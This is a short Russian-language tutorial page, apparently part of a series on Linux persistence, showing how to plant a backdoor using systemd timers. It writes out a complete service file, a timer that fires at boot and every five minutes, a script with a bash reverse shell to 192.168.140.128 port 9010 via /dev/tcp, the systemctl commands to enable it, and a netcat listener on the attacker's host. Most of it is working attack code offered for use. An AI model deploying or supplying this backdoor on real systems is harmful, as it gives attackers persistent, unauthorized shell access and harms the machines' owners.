06 - Systemd Timers
Это пример закрепления точно такой же как и предыдущий, но systemD службы могут запускаться и по расписанию, что гораздно удобнее. Этим мы и воспользуемся. Для этого нам нужно создать 3 файла:
Файл службы systemD
Файл с расписанием для этой службы
Файл вредоносного скрипта
// Создаем сервис /etc/systemd/system/backdoor.service
[Unit]
Description=backdoor service
[Service]
ExecStart=/opt/backdoor.sh// Создаем для сервиса таймер /etc/systemd/system/backdoor.timer
[Unit]
Description=backdoor timer
[Timer]
OnBootSec=5
OnUnitActiveSec=5m
[Install]
WantedBy=timers.target// Вредоносный скрипт /opt/backdoor.sh
#!/usr/bin/bash
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1Перазапустим службы и включим наш таймер
//
systemctl daemon-reload
systemctl enable backdoor.timer
systemctl start backdoor.timer
systemctl list-timers // На хосте атакующего запускам netcat
nc -lvp 9010Теперь через каждые 5 минут будет стартовать наша служба, которая стартанет вредоносный скрипт, а он в свою очередь отдаст нам шел.
Last updated